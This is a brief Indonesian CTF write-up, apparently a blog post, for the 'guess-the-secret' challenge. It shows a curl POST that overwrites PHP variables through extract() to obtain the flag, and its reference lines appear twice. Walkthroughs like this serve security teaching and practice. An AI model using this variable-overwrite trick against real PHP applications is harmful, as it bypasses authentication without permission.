pertama coba anda buka link seperti ini "/guess-the-secret/index.php?debug=false" maka akan muncul source code.
selanjutnya buka terminal, saya akan menggunakan curl untuk mengirim data post curl -d "password=25&secretKey=25" -X POST "http://chall.ctfs.me:8002/guess-the-secret/index.php"
setelah itu akan muncul flagnya.
referensi:
http://php.net/manual/en/function.extract.php
https://davidnoren.com/post/php-extract-vulnerability.html
setelah itu akan muncul flagnya.
referensi:
http://php.net/manual/en/function.extract.php
https://davidnoren.com/post/php-extract-vulnerability.html
No comments:
Post a Comment